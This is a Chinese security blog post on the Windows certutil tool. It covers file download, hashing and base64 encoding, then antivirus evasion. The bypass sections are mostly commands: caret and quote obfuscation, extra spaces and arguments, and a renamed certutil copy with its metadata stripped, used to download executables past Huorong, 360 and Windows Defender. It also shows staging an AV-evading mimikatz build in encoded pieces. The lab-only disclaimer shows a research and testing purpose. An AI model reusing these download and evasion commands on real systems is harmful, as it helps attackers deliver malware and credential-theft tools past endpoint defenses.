certutil工具使用和bypass学习
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!
更新时间:2022.06.08
本文首发乌鸦安全知识星球
本文中部分方法随着时间推移已失效
1. certutil介绍
certutil.exe
是一个合法Windows
文件,用于管理Windows
证书的程序。
官方的解释是: certutil.exe
是一个命令行程序,作为证书服务的一部分安装。您可以使用Certutil.exe
转储和显示证书颁发机构(CA
)配置信息,配置证书服务,备份和还原CA
组件以及验证证书,密钥对和证书链。
以上参考至:https://docs.microsoft.com/zh-cn/windows-server/administration/windows-commands/certutil
certutil
是windows
下一款下载文件的工具,自从WindowsServer2003
就自带,但是在Server 2003
使用会有问题,也就是说,以下命令是在Win7
及其以后的机器中使用。其功能可校验文件MD5
,SHA1
,SHA256
,下载恶意文件和免杀。
以上参考至:[https://blog.csdn.net/bring_coco/article/details/117352716] (https://blog.csdn.net/bring_coco/article/details/117352716)
网上关于certutil
的bypass
文章很多,但是我发现360
很鸡贼,更新贼快,本文用其他的思路免杀看看。
2. 使用介绍
certutil -?
的指令显示,当前可以做的东西非常的多:
2.1 文件下载
这个命令几乎是certutil
使用最多的场景之一,在后面还会详细的介绍,首先在本地搭建一个http
的服务:
此时的下载命令就是:
certutil.exe -urlcache -split -f http://192.168.22.104/crow.txt
-f
覆盖现有文件。
有值的命令行选项。后面跟要下载的文件 url。
-split
保存到文件。
无值的命令行选项。加了的话就可以下载到当前路径,不加就下载到了默认路径。
-urlcache
显示或删除URL缓存条目。
无值的命令行选项。
(certutil.exe 下载有个弊端,它的每一次下载都有留有缓存。)
参考至:https://xz.aliyun.com/t/9737
使用certutil下载文件会产生缓存,用如下命令查看: certutil -urlcache *
使用命令将当前的缓存删除:
certutil -urlcache * delete
此时缓存已经删除 如果想以后下载文件不想要缓存的话,可以在下载文件结尾加上一个delete
certutil.exe -urlcache -split -f http://192.168.22.104/crow.txt delete
2.2 hash验证
在linux
下可以使用md5
、md5sum
等校验hash
值
在Windows
上就可以使用certutil
来计算:
certutil -hashfile crow.txt MD5 //检验MD5
certutil -hashfile crow.txt SHA1 //检验SHA1
certutil -hashfile crow.txt SHA256 //检验SHA256
2.3 base64加解密
在这篇文章里面作者使用certutil
对大文件进行了编码传输,并在文件传输之后,将文件进行了还原。
他主要使用的就是使用certutil
的encode
和decode
进行加解密。具体文章地址:https://xz.aliyun.com/t/9737
在这里我以自己以前做的免杀mimikatz
复现一下。
首先将该文件使用certutil
进行编码:
certutil -encode crowsec_bypass_mimikatz.exe m.txt
将文件使用notepad
打开,当前文件一共9w
多行:
按照作者的方法,我将文件分为3个:
使用ctrl + g
进行快速定位:
当前分割之后的文件分别为1.txt 2.txt
3.txt
。
然后再使用命令将当前的文件下载过来:
certutil.exe -urlcache -split -f http://192.168.22.104/1.txt
certutil.exe -urlcache -split -f http://192.168.22.104/2.txt
certutil.exe -urlcache -split -f http://192.168.22.104/3.txt
将3个文件合并到一个文件中去:
copy *.txt mimikatz.txt //把当前目录下的所有txt合并为mimikatz.txt
然后对文件进行编码:
certutil -decode mimikatz.txt m.exe
此时文件的hash
值和原来的hash
值相同:
3. Bypass
在我执行命令的过程中,发现了好多次被各种av
拦截,所以在这里学习下如何bypass
在下面这个链接中
https://view.inews.qq.com/a/20220530A04RST00
作者对于各种场景进行了bypass
和分析,但是在这里发现其中有些方法已经失效了,某某某杀软更新频繁,基本上对着更新,速度很快,那再试试其他的方法吧。
3.1 火绒(已失效)
环境:windows7
+ 最新版火绒
直接执行命令:
certutil -urlcache -split -f http://192.168.22.102/1.txt
certutil -urlcache -split -f http://192.168.22.102/2.txt
certutil -urlcache -split -f http://192.168.22.102/3.txt
文件都下载下来了,火绒没有对此进行拦截,那如果下载一个exe
呢?在这里下载一个cmd.exe
试试:
certutil -urlcache -split -f http://192.168.22.102/cmd.exe
我的火绒没有对此进行任何的拦截操作。。。。
后来才发现,原来是我的空格问题,我在-spilt
之前多空了一格:
空格两个,bypass 火绒:certutil -urlcache -split -f http://192.168.22.102/1.exe
正常的一个空格:certutil -urlcache -split -f http://192.168.22.102/1.exe
多余空格
所以bypass
的方法就很多了,最简单的就是多空一格:
certutil -urlcache -split -f http://192.168.22.102/1.exe -f参数空两格
多余参数
不过可以在火绒中加上任意多余的参数:
certutil -urlcache -f -split -f http://192.168.22.102/1.exe
混淆字符
certutil -u^r^l^cache -split -f http://192.168.22.102/1.exe
3.2 360
certutil -urlcache -split -f http://192.168.22.102/1.exe
直接被拦截:
通过学习可知,混淆无法绕过360
,所以将certutil
文件拷贝到当前目录,然后执行命令:
where certutil
copy C:\Windows\System32\certutil.exe crow.exe
再来执行命令试试:
crow -urlcache -split -f http://192.168.22.102/cmd.exe
依旧被拦截!执行crow -urlcache
也是一样的结果:这说明360
已经更新了,而且速度很快:
经过多次操作之后发现,基本上混淆啥的都是没用的,在这里使用restorator 2018
这个工具打开看下,它可以修改exe
的属性和图标等:
打开之后可以看到这里有很醒目的版本信息:
所以在这里对版本、图标等全部删除:
将文件另存为crow3.exe
crow3.exe -urlcache -split -f http://192.168.22.102/cmd.exe
此时文件下载成功。
所以对于360来说(截止2022.06.09)
where certutil
copy C:\Windows\System32\certutil.exe crow.exe
将crow.exe 去特征,再执行命令
crow3 -urlcache -split -f http://192.168.22.102/cmd.exe
3.3 windows Defender
当前环境为Windows10 ltsb
长期服务器版 启用windows Defender
直接执行的时候,直接杀
certutil -urlcache -split -f http://192.168.22.102/cmd.exe
简单变形之后,还是杀
certutil -u^r^l^c^a^c^he -split -f http://192.168.22.102/cmd.exe
使用刚刚过360的方法,一样被杀:
crow3 -urlcache -split -f http://192.168.22.102/cmd.exe
下面这个命令不杀:
crow3 -urlcache
继续:
crow3 -urlcache -split
crow3 -urlcache -split -f
crow3 -urlcache -split -f http:
很明显了,这里就开始杀了,要混淆才行。
crow3 -url""cache -split -f http://192.168.22.102/cmd.exe
还是不行。 终于,使用"""
bypass成功。
certutil -url""""cache -split -f http://192.168.22.102/cmd.exe
使用这个也可以绕过:
经过测试发现,使用""""
都可以绕过windows Defender
4. 总结
针对certitul
的使用,对av
来说,查杀不算严格,cmd
命令混淆的目的就是为这类服务的,对于不同的环境有不同的方法来做,不要太追求bypass everyone
。
本文跨度时间周期较长,其中的某些方法已经无法过杀软,仅供参考。